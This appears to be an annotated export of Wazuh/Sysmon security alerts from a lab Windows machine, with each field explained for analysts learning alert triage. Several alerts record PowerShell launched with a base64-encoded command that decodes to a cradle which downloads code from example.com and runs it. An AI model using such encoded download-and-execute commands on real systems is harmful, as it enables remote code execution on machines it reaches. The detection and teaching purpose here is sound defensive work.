rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 112 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534428.2068054 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:25.7046533Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285960 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:25.693
ProcessGuid: {94294ddc-bdd8-680a-d10b-000000000e00}
ProcessId: 4932
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_z2gh0htk.wyn.ps1
CreationUtcTime: 2025-04-24 22:40:25.693
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:25.693 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdd8-680a-d10b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_z2gh0htk.wyn.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:25.693 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 109 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534430.2070819 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:28.0845268Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285983 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:26.887
ProcessGuid: {94294ddc-bdda-680a-d30b-000000000e00}
ProcessId: 11028
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdd8-680a-d10b-000000000e00}
ParentProcessId: 4932
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:26.887 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdda-680a-d30b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11028 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdd8-680a-d10b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 4932 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 113 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534430.2078886 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:28.7262487Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285988 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:28.699
ProcessGuid: {94294ddc-bdda-680a-d30b-000000000e00}
ProcessId: 11028
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mvu4gl2r.2ky.ps1
CreationUtcTime: 2025-04-24 22:40:28.699
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:28.699 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdda-680a-d30b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11028 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mvu4gl2r.2ky.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:28.699 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 110 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534433.2081655 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:31.1947018Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 286008 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:29.920
ProcessGuid: {94294ddc-bddd-680a-d50b-000000000e00}
ProcessId: 16696
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdda-680a-d30b-000000000e00}
ParentProcessId: 11028
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:29.920 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bddd-680a-d50b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16696 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdda-680a-d30b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11028 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 114 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534433.2089726 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:31.3710438Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 286009 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:31.361
ProcessGuid: {94294ddc-bddd-680a-d50b-000000000e00}
ProcessId: 16696
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4ssfrd1y.lll.ps1
CreationUtcTime: 2025-04-24 22:40:31.361
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:31.361 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bddd-680a-d50b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16696 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4ssfrd1y.lll.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:31.361 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
